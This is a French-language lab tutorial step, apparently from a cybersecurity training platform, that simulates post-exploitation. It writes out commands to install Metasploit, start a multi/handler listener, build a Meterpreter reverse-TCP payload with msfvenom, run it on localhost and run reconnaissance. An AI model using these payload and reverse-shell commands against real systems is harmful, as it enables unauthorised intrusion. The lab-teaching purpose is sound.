Identification d'un service sur le réseau interne d'une cible
Dans cette étape, nous allons simuler l'obtention d'une session Meterpreter sur une machine cible. Dans un scénario réel, cela serait réalisé en exploitant une vulnérabilité. Pour ce laboratoire, nous allons configurer un écouteur dans Metasploit et exécuter manuellement une charge utile pour s'y connecter. Cela nous permettra de nous concentrer sur la phase post-exploitation.
Tout d'abord, nous devons installer le Metasploit Framework.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Ensuite, ouvrez un terminal et démarrez la console Metasploit.
msfconsole -q
Dans msfconsole, nous allons configurer un gestionnaire (handler) pour écouter les connexions entrantes.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Maintenant, ouvrez un nouveau terminal (vous pouvez utiliser le bouton "+" dans l'onglet du terminal). Dans ce nouveau terminal, nous allons générer et exécuter une charge utile pour nous reconnecter à notre écouteur.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
Revenez à votre premier terminal avec msfconsole. Vous devriez voir un message indiquant qu'une nouvelle session a été ouverte. Interagissons avec elle.
sessions -l
sessions -i 1
Vous êtes maintenant dans une session Meterpreter. Une première étape courante consiste à effectuer une reconnaissance. Vérifions les interfaces réseau de l'hôte "compromis".
ifconfig
Vous verrez plusieurs interfaces réseau. Pour ce laboratoire, nous supposerons que, grâce à des analyses supplémentaires (qui dépassent le cadre de ce laboratoire), nous avons découvert un service web fonctionnant sur 127.0.0.1 au port 8080. Notre objectif est d'accéder à ce service.